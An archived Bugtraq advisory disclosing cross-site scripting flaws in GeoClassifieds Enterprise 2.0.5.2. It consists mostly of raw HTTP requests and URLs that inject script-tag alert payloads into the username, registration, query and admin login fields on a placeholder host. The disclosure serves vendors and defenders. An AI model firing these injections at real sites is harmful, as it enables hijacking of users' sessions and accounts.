Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

GeoClassifieds Enterprise <= 2.0.5.2 Cross Site Scripting

From: securityconnection () gmail com
Date: 27 Jul 2006 05:59:07 -0000
GeoClassifieds Enterprise 2.0.5.2
http://geodesicsolutions.com/products/classifieds/classifieds_enterprise.htm
--------------------------
Cross Site Scripting (XSS)
--------------------------
POST http://target.xx:80/index.php?a=10 HTTP/1.0
Host: target.xx
Content-Type: application/x-www-form-urlencoded
Content-Length: 115
b[username]="><script>alert(/EllipsisSecurityTest/)</script>&b[password]2=1&submit=1 
---
POST http://target.xx:80/register.php?b=1 HTTP/1.0
Host: target.xx
Content-Type: application/x-www-form-urlencoded
Content-Length: 208
c[firstname]=1&c[lastname]=1&c[company_name]=1&c[business_type]=1&c[business_type]=1&c[address]=1&c[address_2]=1&c[city]=1&c[zip]=1&c[phone]="><script>alert(/EllipsisSecurityTest/)</script>
---
http://target.xx/index.php?a=11&b=0&c=><script>alert(/EllipsisSecurityTest/)</script>&d=5
http://target.xx/admin/index.php?b[username]=";><script>alert(/EllipsisSecurityTest/)</script>&b[password]=1
-----------------
Ellipsis Security
http://www.ellsec.org
Previous By Date Next
Previous By Thread Next

Current thread: